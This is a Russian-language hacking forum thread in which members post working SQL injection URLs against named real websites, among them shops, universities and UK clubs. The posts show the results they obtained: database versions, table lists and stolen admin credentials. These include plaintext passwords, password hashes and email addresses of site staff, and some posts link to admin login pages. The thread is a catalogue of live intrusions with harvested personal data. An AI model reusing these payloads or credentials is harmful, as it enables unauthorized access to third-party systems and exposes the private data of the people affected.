SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://telemex.ru//index.php?category=-1+union+all+select+1,2,3,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),5+--
    version : 5.1.34
    user : reee_biz@localhost
    database : reee_biz
    os : linux-gnu
     
  2. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    Code:
    http://www.homegate.ru/board?code=show&id=-28409+union+select+1,2,3,4,5,6,concat_ws(0x3a,nick,hash,salt,email),8,9,10,11,12,13,14+from+neway_users--
    PR:3
    ТиЦ:50
    Посещалка:1,5к-2к в сутки.
     
  3. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://www.samenta.ru/catalog/?lang=rus&c_id=1&p_id=-1+union+select+1,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17+--
    version : 4.0.26
    user : [email protected]
    database : samentaru
    os : unknown-freebsd6.1
     
  4. LanSilot

    LanSilot New Member

    Joined:
    10 Apr 2010
    Messages:
    20
    Likes Received:
    4
    Reputations:
    5
    Code:
    http://www.bcspeakers.com/product.php?id=-11+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+_user--
    lcd:lcd2008
    bcadmin:bc2008
     
  5. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://market.remont99.ru/news.php?id=-16+union+all+select+1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6,7+--
    version : 4.1.25-log
    user : remont94_olga@localhost
    database : remont94_db
    os : portbld-freebsd6.3
     
  6. Financier

    Financier New Member

    Joined:
    12 Dec 2009
    Messages:
    5
    Likes Received:
    4
    Reputations:
    3
    Code:
    http://www.ayrshireandgalloway.co.uk/news.php?id=99999+union+select+1,2,3,4,5--
    Code:
    http://www.treatbalham.co.uk/news.php?id=99999+union+select+1,2,version(),4,5,6+from+news--
    Code:
    http://www.saintstrust.co.uk/news.php?id=99999+union+select+1,2,3,4,5,concat_ws(0x3a,username,password,email),7,8+from+t_user+limit+0,1--
    Code:
    http://www.vibixa.co.uk/news.php?id=9999+union+select+1,table_name,3,4,5,6+from+information_schema.tables+limit+17,1--
    career category client colour gallery_image garden_accessories link order_head
    page roof_style seating_upholstery summerhouse summerhouse_has_colour summerhouse_has_garden summerhouse_has_garden_order summerhouse_has_roof
    summerhouse_has_seating 
    Code:
    http://connexions.oberon.titaninternet.co.uk/news.php?id=9999+union+select+1,2,version(),4,5--
    Code:
    http://www.arbroathpool.co.uk/news.php?id=99999+union+select+1,2,version()+from+news--
    Code:
    http://www.kentonvineyard.co.uk/news.php?id=999+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables+limit+17,1--
    gst_events gst_news gst_products
    Code:
    http://www.staddonheightsgolf.co.uk/news.php?id=999+union+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables+limit+28,1--
    wcusers:username wcusers:password wcusers:ip //но таблица пуста.
    Code:
    http://www.docbrown.co.uk/news.php?id=999+union+select+1,2,version(),4+news--
    Code:
    http://www.rimrecords.co.uk/rim-news.php?id=9999+union+select+1,2,3,version()--
    Code:
    http://www.krehalonuk.co.uk/news.php?id=9999+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+news--
     
    #11986 Financier, 6 May 2010
    Last edited: 8 May 2010
  7. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    Code:
    http://www.forceofnature.org/events.php?id=-36+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),10--+
    version:5.0.45-log
    user:[email protected]
     
  8. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    Сайт: http://www.travellux.com
    ТИЦ: 70
    PR: 4
    Пример запроса:
    Code:
    http://www.travellux.com/index4.php?mode=57&select=about_us&id=-1364'+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,id,0x3a,name,0x3a,email,0x3a,password),null,null,8,9,10,11,12,13,14,15,16,17+from+users--+
    version - 5.0.84-log
    user - travell@localhost
    database - travell00
    os - portbld-freebsd6.1
    tables:

    Code:
    CHARACTER_SETS,   
    COLLATIONS,   
    COLLATION_CHARACTER_SET_APPLICABILITY,   
    COLUMNS,   
    COLUMN_PRIVILEGES,   
    KEY_COLUMN_USAGE,   
    PROFILING,   
    ROUTINES,   
    SCHEMATA,   
    SCHEMA_PRIVILEGES,   
    STATISTICS,   
    TABLES,   
    TABLE_CONSTRAINTS,   
    TABLE_PRIVILEGES,   
    TRIGGERS,   
    USER_PRIVILEGES,   
    VIEWS,   
    abroad,   
    allCodes,   
    articles,   
    categ,   
    consultations,   
    countries,   
    data_turs,   
    datehotels,   
    dates,   
    documents,   
    down,   
    hotels,   
    images,   
    menu_left,   
    operators,   
    parameters,   
    parts,   
    prices,   
    quest_busy,   
    questions,   
    registry,   
    registryold,   
    sites,   
    timetable,   
    users
    columns:

    Code:
    CHARACTER_SET_NAME,   
    DEFAULT_COLLATE_NAME,   
    DESCRIPTION,   
    MAXLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    ID,   
    IS_DEFAULT,   
    IS_COMPILED,   
    SORTLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    COLUMN_DEFAULT,   
    IS_NULLABLE,   
    DATA_TYPE,   
    CHARACTER_MAXIMUM_LENGTH,   
    CHARACTER_OCTET_LENGTH,   
    NUMERIC_PRECISION,   
    NUMERIC_SCALE,   
    CHARACTER_SET_NAME,   
    COLLATION_NAME,   
    COLUMN_TYPE,   
    COLUMN_KEY,   
    EXTRA,   PRIVILEGES,   
    COLUMN_COMMENT,   
    GRANTEE,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    PRIVILEGE_TYPE,   
    IS_GRANTABLE,   
    CONSTRAINT_CATALOG,   
    CONSTRAINT_SCHEMA,   
    CONSTRAINT_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    POSITION_IN_UNIQUE_CONSTRAINT,
    REFERENCED_TABLE_SCHEMA,   
    REFERENCED_TABLE_NAME,   
    REFERENCED_COLUMN_NAME,   
    QUERY_ID,   
    SEQ,   
    STATE,   
    DURATION,   
    CPU_USER,   
    CPU_SYSTEM,   
    CONTEXT_VOLUNTARY,   
    CONTEXT_INVOLUNTARY,   
    BLOCK_OPS_IN,   
    BLOCK_OPS_OUT,   
    MESSAGES_SENT,   
    MESSAGES_RECEIVED,   
    PAGE_FAULTS_MAJOR,   
    PAGE_FAULTS_MINOR,   
    SWAPS,   
    SOURCE_FUNCTION,   
    SOURCE_FILE,   
    SO
    =========================================

    Сайт: http://www.tangotiger.net
    ТИЦ: 10
    PR: 3
    Пример запроса:
    Code:
    http://www.tangotiger.net/scout/index4.php?teamid=-114+union+select+concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,column_name),3,4,null,null,7,null,null,now(),null,null,null,null,null,null+from+information_schema.columns--+
    version - 5.0.67-log
    user - [email protected]
    database - scoudb
    os - pc-linux-gnu
    tables:

    Code:
    CHARACTER_SETS,   
    COLLATIONS,   
    COLLATION_CHARACTER_SET_APPLICABILITY,   
    COLUMNS,   
    COLUMN_PRIVILEGES,   
    KEY_COLUMN_USAGE,   
    PROFILING,   
    ROUTINES,   
    SCHEMATA,   
    SCHEMA_PRIVILEGES,   
    STATISTICS,   
    TABLES,   
    TABLE_CONSTRAINTS,   
    TABLE_PRIVILEGES,   
    TRIGGERS,   
    USER_PRIVILEGES,   
    VIEWS,   
    BALLOTS,   
    CHECKSUM_FAN,   
    CHECKSUM_FAN_DUPS,   
    CHECKSUM_FAN_IPADDR,   
    CHECK_VOTES,   
    CHECK_VOTE
    columns:

    Code:
    CHARACTER_SET_NAME,   
    DEFAULT_COLLATE_NAME,   
    DESCRIPTION,   
    MAXLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    ID,   
    IS_DEFAULT,   
    IS_COMPILED,   
    SORTLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    COLUMN_DEFAULT,   
    IS_NULLABLE,   
    DATA_TYPE,   
    CHARACTER_MAXIMUM_LENGTH,   
    CHARACTER_OCTET_LENGTH,   
    NUMER
    =========================================

    Сайт: http://artem.ip-nsk.ru
    ТИЦ: 0
    PR: 0
    Пример запроса:
    Code:
    http://artem.ip-nsk.ru/tdk/index4.php?idd=-53+union+select+1,group_concat(0x0b,id,0x3a,username,0x3a,password),3,null,5,6,7,8,9,10+from+cute_users--+
    version - 5.0.90-community
    user - ipdenis_admin@localhost
    database - ipdenis_tdk
    os - pc-linux-gnu
    tables:

    Code:
    CHARACTER_SETS,   
    COLLATIONS,   
    COLLATION_CHARACTER_SET_APPLICABILITY,   
    COLUMNS,   
    COLUMN_PRIVILEGES,   
    KEY_COLUMN_USAGE,   
    PROFILING,   
    ROUTINES,   
    SCHEMATA,   
    SCHEMA_PRIVILEGES,   
    STATISTICS,   
    TABLES,   
    TABLE_CONSTRAINTS,   
    TABLE_PRIVILEGES,   
    TRIGGERS,   
    USER_PRIVILEGES,   
    VIEWS,   
    cute_categories,   
    cute_comments,   
    cute_flood,   
    cute_ipban,   
    cute_news,   
    cute_story,   
    cute_users,   
    categg,   
    email,   
    files,   
    kapital_zed_admin_menu,   
    kapital_zed_articles,   
    kapital_zed_brotator,   
    kapital_zed_category,   
    kapital_zed_form,   
    kapital_zed_news,   
    kapital_zed_pages,   
    kapital_zed_redirect,   
    kapital_zed_site_menu,   
    kapital_zed_siteinfo,   
    kapital_zed_tplblock,   
    kapital_zed_tplmanager,   
    kapital_zed_users,   
    tovari,   
    zed_news,   
    zed_news2,   
    cute_categories,   
    cute_comments,   
    cute_flood,   
    cute_ipban,   
    cute_news,   
    cute_story,   
    cute_users,   
    files,   
    kapital_zed_admin_menu,   
    kapital_zed_articles,   
    kapital_zed_brotator,   
    kapital_zed_category,   
    kapital_zed_form,   
    kapital_zed_news,   
    kapital_zed_pages,   
    kapital_zed_redirect,   
    kapital_zed_site_menu,   
    kapital_zed_siteinfo,   
    kapital_zed_tplblock,   
    kapital_zed_tplman  
    columns:

    Code:
    CHARACTER_SET_NAME,   
    DEFAULT_COLLATE_NAME,   
    DESCRIPTION,   
    MAXLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    ID,   
    IS_DEFAULT,   
    IS_COMPILED,   
    SORTLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    COLUMN_DEFAULT,   
    IS_NULLABLE,   
    DATA_TYPE,   
    CHARACTER_MAXIMUM_LENGTH,   
    CHARACTER_OCTET_LENGTH,   
    NUMERIC_PRECISION,   
    NUMERIC_SCALE,   
    CHARACTER_SET_NAME,   
    COLLATION_NAME,   
    COLUMN_TYPE,   
    COLUMN_KEY,   
    EXTRA,   
    PRIVILEGES,   
    COLUMN_COMMENT,   
    GRANTEE,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    PRIVILEGE_TYPE,   
    IS_GRANTABLE,   
    CONSTRAINT_CATALOG,   
    CONSTRAINT_SCHEMA,   
    CONSTRAINT_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    POSITION_IN_UNIQUE_CONSTRAINT,
    REFERENCED_TABLE_SCHEMA,   
    REFERENCED_TABLE_NAME,   
    REFERENCED_COLUMN_NAME,   
    QUERY_ID,   
    SEQ,   
    STATE,   
    DURATION,   
    CPU_USER,   
    CPU_SYSTEM,   
    CONTEXT_VOLUNTARY,   
    CONTEXT_INVOLUNTARY,   
    BLOCK_OPS_IN,   
    BLOCK_OPS_OUT,   
    MESSAGES_SENT,   
    MESSAGES_RECEIVED,   
    PAGE_FAULTS_MAJOR,   
    PAGE_FAULTS_MINOR,   
    SWAPS,   
    SOURCE_FUNCTION,   
    SOURCE_FILE,   
    SO
     
    #11988 aka_zver, 6 May 2010
    Last edited: 6 May 2010
  9. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    390
    Reputations:
    58
    Code:
    http://www.carnegie-institute.[COLOR=red][SIZE=3]edu[/SIZE][/COLOR]/careerPosting.php?id=-1+union+select+1,version(),3,4,5/*
    Database Version: 4.1.25-Debian_mt1
    Database name: db8721_content
    User name: [email protected]

    ----------------------------------------------------------------------------------------------------------

    Code:
    http://ecet.spsu.[SIZE=3][COLOR=Red]edu[/COLOR][/SIZE]/FacultyStaff.php?id=-24+union+select+1,version(),3,4,5,6,7,8,9,10--
    Database Version: 5.0.77
    Database name: ecet
    User name: ecet@localhost

    ----------------------------------------------------------------------------------------------------------

    Code:
    http://www.bikeweek.org.uk/page.php?id=64'+union+select+1,group_concat(user_id,0x3a,user_password),3+from+users/*
    Look at the source code

    Database Version: 4.1.22-community-nt-log
    Database name: bikeweek10live
    User name: bikeweek10@localhost
     
    #11989 Skofield, 6 May 2010
    Last edited: 6 May 2010
    1 person likes this.
  10. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    Сайт: http://www.infotex.ru
    ТИЦ: 80
    PR: 4
    Примеры запросов:
    Code:
    http://www.infotex.ru/index4.php?p=-174+union+select+1,group_concat(0x0b,column_name),3,4,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),6,now(),8,9+from+information_schema.columns+where+table_name=0x7573657273--+  
    
    http://www.infotex.ru/index4.php?p=-174+union+select+1,group_concat(0x0b,login,0x3a,hash,0x3a,salt),null,4,group_concat(0x0b,mail),6,now(),8,9+from+users--+
    version - 5.1.36-log
    user - [email protected]
    database - fotoclub31_computer31
    os - portbld-freebsd7.2
    tables:

    Code:
    CHARACTER_SETS,   
    COLLATIONS,   
    COLLATION_CHARACTER_SET_APPLICABILITY,   
    COLUMNS,   
    COLUMN_PRIVILEGES,   
    ENGINES,   
    EVENTS,   
    FILES,   
    GLOBAL_STATUS,   
    GLOBAL_VARIABLES,   
    KEY_COLUMN_USAGE,   
    PARTITIONS,   
    PLUGINS,   
    PROCESSLIST,   
    PROFILING,   
    REFERENTIAL_CONSTRAINTS,   
    ROUTINES,   
    SCHEMATA,   
    SCHEMA_PRIVILEGES,   
    SESSION_STATUS,   
    SESSION_VARIABLES,   
    STATISTICS,   
    TABLES,   
    TABLE_CONSTRAINTS,   
    TABLE_PRIVILEGES,   
    TRIGGERS,   
    USER_PRIVILEGES,   
    VIEWS,   
    Product,   
    Product2,   
    Product3,   
    all_Product,   
    group_name,   
    group_name_main,   
    info_for_redact_infotex,   
    info_for_redact_teny_mce,   
    menu_left,   
    new_Product,   
    news,   
    news_infotex,   
    our_news,   
    tehcentr,   
    text_in_page,   
    text_main_in_page,   
    type_news_infotex,   
    upd_price,   
    users,   
    vendor,   
    Product,   
    Product3,   
    advice,   
    albom_for_exhibition,   
    author,   
    beeline_galery,   
    beeline_galery_ball_user,   
    book_biblioteka,   
    categories,   
    club_cart_info,   
    coment_advice,   
    coment_personal_page,   
    coment_photo_help,   
    coment_reportage,   
    comment_photo,   
    comment_photo2,   
    config,   
    config_db,   
    discussion_author_photo,   
    exhibition,   
    favorite_author_photo,   
    for_del_photo,   
    foto_blic_o
    columns:

    Code:
    CHARACTER_SET_NAME,   
    DEFAULT_COLLATE_NAME,   
    DESCRIPTION,   
    MAXLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    ID,   
    IS_DEFAULT,   
    IS_COMPILED,   
    SORTLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    COLUMN_DEFAULT,   
    IS_NULLABLE,   
    DATA_TYPE,   
    CHARACTER_MAXIMUM_LENGTH,   
    CHARACTER_OCTET_LENGTH,   
    NUMERIC_PRECISION,   
    NUMERIC_SCALE,   
    CHARACTER_SET_NAME,   
    COLLATION_NAME,   
    COLUMN_TYPE,   
    COLUMN_KEY,   
    EXTRA,   
    PRIVILEGES,   
    COLUMN_COMMENT,   
    GRANTEE,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    PRIVILEGE_TYPE,   
    IS_GRANTABLE,   
    ENGINE,   
    SUPPORT,   
    COMMENT,   
    TRANSACTIONS,   
    XA,   
    SAVEPOINTS,   
    EVENT_CATALOG,   
    EVENT_SCHEMA,   
    EVENT_NAME,   
    DEFINER,   
    TIME_ZONE,   
    EVENT_BODY,   
    EVENT_DEFINITION,   
    EVENT_TYPE,   
    EXECUTE_AT,   
    INTERVAL_VALUE,   
    INTERVAL_FIELD,   
    SQL_MODE,   
    STARTS,   
    ENDS,   
    STATUS,   
    ON_COMPLETION,   
    CREATED,   
    LAST_ALTERED,   
    LAST_EXECUTED,   
    EVENT_COMMENT,   
    ORIGINATOR,   
    CHARACTER_SET_CLIENT,   
    COLLATION_CONNECTION,   
    DATABASE_COLLATION,   
    FILE_ID,   
    FILE_NAME,   
    FILE_TYPE,   
    TABLESPACE_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAM
    ========================================
    Сайт: http://www.kazanclub.ru
    ТИЦ: 20
    PR: 0
    Примеры запросов:
    Code:
    http://www.kazanclub.ru/gallery.php?cat=-4+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6--+  
    
    http://www.kazanclub.ru/gallery.php?cat=-4+union+select+1,group_concat(0x0b,column_name),3,4,5,6+from+information_schema.columns--+
    version - 5.1.41-log
    user - kazanclu_rukazan@localhost
    database - kazanclu_rukazanclub2
    os - unknown-linux-gnu
    tables:

    Code:
    CHARACTER_SETS, 
    COLLATIONS, 
    COLLATION_CHARACTER_SET_APPLICABILITY, 
    COLUMNS, 
    COLUMN_PRIVILEGES, 
    ENGINES, 
    EVENTS, 
    FILES, 
    GLOBAL_STATUS, 
    GLOBAL_VARIABLES, 
    KEY_COLUMN_USAGE, 
    PARTITIONS, 
    PLUGINS, 
    PROCESSLIST, 
    PROFILING, 
    REFERENTIAL_CONSTRAINTS, 
    ROUTINES, 
    SCHEMATA, 
    SCHEMA_PRIVILEGES, 
    SESSION_STATUS, 
    SESSION_VARIABLES, 
    STATISTICS, 
    TABLES, 
    TABLE_
    columns:

    Code:
    CHARACTER_SET_NAME,   
    DEFAULT_COLLATE_NAME,   
    DESCRIPTION,   
    MAXLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    ID,   
    IS_DEFAULT,   
    IS_COMPILED,   
    SORTLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    COLUMN_DEFAULT,   
    IS_NULLABLE,   
    DATA_TYPE,   
    CHARACTER_MAXIMUM_LENGTH,   
    CHARACTER_OCTET_LENGTH,   
    NUMER
     
    #11990 aka_zver, 6 May 2010
    Last edited: 6 May 2010
    2 people like this.
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.carte-bleue.com/page.asp?menu_id=26+OR+1=(SELECT+TOP+1+password+FROM+tbl_user_admin+where+Login='webadmcb')

    (pinch sps)
     
    _________________________
  12. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    75
    Likes Received:
    36
    Reputations:
    14
    Host IP: 216.218.227.242
    Web Server: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7a DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a
    Powered-by: PHP/4.4.0
    DB Server: MySQL
    Current DB: warren

    Host IP: 89.18.180.54
    Web Server: Apache/2
    Powered-by: PHP/5.2.5
    DB Server: MySQL >=5
    Current DB: lulworth_Algemeen

    Host IP: 213.21.225.48
    Web Server: Apache
    DB Server: MySQL >=4.1
    Current DB: warehouse

    Host IP: 77.221.132.188
    Web Server: nginx/0.4.13
    Powered-by: PHP/5.2.0-8+etch11
    DB Server: MySQL >=5
    Current DB: dex


    Host IP: 89.18.180.54
    Web Server: Apache/2
    Powered-by: PHP/5.2.5
    DB Server: MySQL >=5
    Current DB: lulworth_Algemeen

    Host IP: 140.130.1.19
    Web Server: Apache/2.2.10 (Unix) PHP/4.4.9
    Powered-by: PHP/4.4.9
    DB Server: MySQL >=5
    Current DB: RSS23_NFU

    Host IP: 217.77.176.230
    Web Server: Zeus/4.2
    Powered-by: PHP/4.4.2
    DB Server: MySQL
    Current DB: connexions-berkshire

    Host IP: 69.163.245.54
    Web Server: Apache
    Powered-by: PHP/5.2.12
    DB Server: MySQL >=5
    Current DB: rhinossoccer
     
    1 person likes this.
  13. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Шопер какой то..

    http://pc-rakitan.com/home/?v=modul&mod=order&id=-3549+union+select+concat_ws(0x3a,user(),version(),database())--&a=add

    Database Version: 5.0.89-community
    Database name: pcrakit_cmscatalog
    User name: pcrakit_usercms@localhost

    Ракитанчиков там в 3000 -)


    http://pc-rakitan.com/home/?v=modul&mod=order&id=-3549+UNION+SELECT+CONCAT(0x3a,(SELECT+CONCAT(members_password,0x3a,members_email)+FROM+pcrakit_cmscatalog.cms_members+LIMIT+50,1),0x3a)-- &a=add
     
    1 person likes this.
  14. b82a

    b82a Elder - Старейшина

    Joined:
    7 Feb 2010
    Messages:
    150
    Likes Received:
    48
    Reputations:
    25
    Code:
    http://www.brilliant-info.ru/showinfo.php?id=99999+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++
    User: u55884@localhost
    Version: 5.0.77
    Database: brillian_info


    Code:
    http://www.procctv.ru/page.php?id=-1%27+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++
    User: procctv@localhost
    Database: cms
    Version: 5.0.45-log

    Code:
    http://www.advokaterne.net/index.php?act=info&id=-1+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++
    User: web57_u1@localhost
    Version: 5.0.51a-24+lenny3
    Database: web57_db1

    Code:
    http://www.bad-endbach.info/index.php?id=1699&lang=-1+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++
    User: '[email protected]
    Version: 5.0.81-log
    Database: db242799363
     
    #11994 b82a, 7 May 2010
    Last edited: 7 May 2010
  15. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Code:
    http://www.belmontburlesque.com/cast.php?id=-2+union+select+1,group_concat%28user_name,0x3a,user_password%29,3,4,5,6,7+from+administrators--
     
  16. p@pillon

    p@pillon New Member

    Joined:
    3 May 2010
    Messages:
    4
    Likes Received:
    2
    Reputations:
    4
    Pr 3

    http://www.lanceburton.org/

    http://www.lanceburton.org/cast.php?id=-1+union+all+select+1,2,version(),4,5,6

    User: [email protected]
    Version: 5.1.39-LOG
    Database: LBURTON
     
  17. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://www.troykastal.ru/second.php?content_id=news_item&news_id=-177+union+all+select+1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3+--
    version : 5.0.24-standard
    user : [email protected]
    database : db_troykastal
    os : pc-linux-gnu

    Code:
    http://www.troykastal.ru/second.php?content_id=news_item&news_id=-177+union+all+select+1,concat_ws(0x3a,login,password),3+from+admin--
    http://www.troykastal.ru/administrator/
     
    2 people like this.
  18. b82a

    b82a Elder - Старейшина

    Joined:
    7 Feb 2010
    Messages:
    150
    Likes Received:
    48
    Reputations:
    25
    Эх, надоело с ней возиться

    Code:
    http://tur.by/index.php?page=info&mode=region&id=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,19,20,21,22,23,24,25,26,27%20+--+&cid=36&rating=3&full
    User: turby@localhost
    Database: turby
    Version: 5.0.32-Debian_7etch5

    И всё чо надыбал пока возился:
    Ну и хеши соответственно нельзя ;)
     
    #11998 b82a, 7 May 2010
    Last edited: 7 May 2010
    2 people like this.
  19. Iron47

    Iron47 Member

    Joined:
    23 May 2009
    Messages:
    0
    Likes Received:
    11
    Reputations:
    -2
    Code:
    http://www.glosters.org.uk/collectionitem.php?id=1721%20and%2030=3%20union%20all%20select%201,2,group_concat(id,0x3a,username,0x3a,password,0x3a,lastseen,0x3a,access,0x3a,email),4,5,6,7,8,9,10,11,12,13,14%20from%20staff--

    Code:
    14:dsuk:2c3488fcd05c24c386b9bb0eeaff5ae9:1272531925:1:,2:glosters:5811ab9d1aebc5f6c3a26a19943f4e94:1159865689:255:[email protected],4:chrisryland:3e5979f32353bf310b5f9b47aebf5d1a:1271605911:0:[email protected],5:DRead:a596b2bf531f416c9f2b6651c194149c:1273221516:0:[email protected],6:GStreatfeild:11eabf88a3d7f430bb44fff0e902d3b1:1270652183:0:[email protected],7:GGordon:ec025b9b5d6091f07f31440252e38b46:1273047690:0:[email protected],8:JHayes:64489efaf33c2d914ca8160251287507:1272982754:0:[email protected],9:stephen:bb32cf5500bfcc4100088d3e2b07237b:1271773560:0:[email protected],15:louise:1bdd0db9a74407f577a5c92d8ab308dc:1252508387:0:,16:curator:4ca2212a3086376b245df2620870b63f:1272485207:0:[email protected]
     
  20. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://www.linorusso.ru/catalog.php?parent_id=36&tov_id=-194+union+select+1,2,3,4,5,6,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20--+
    version : 6.0.11-alpha-log первый раз попалась 6 версия
    user : tehnodom@localhost
    database : linorusso
    os : portbld-freebsd7.1
     
Thread Status:
Not open for further replies.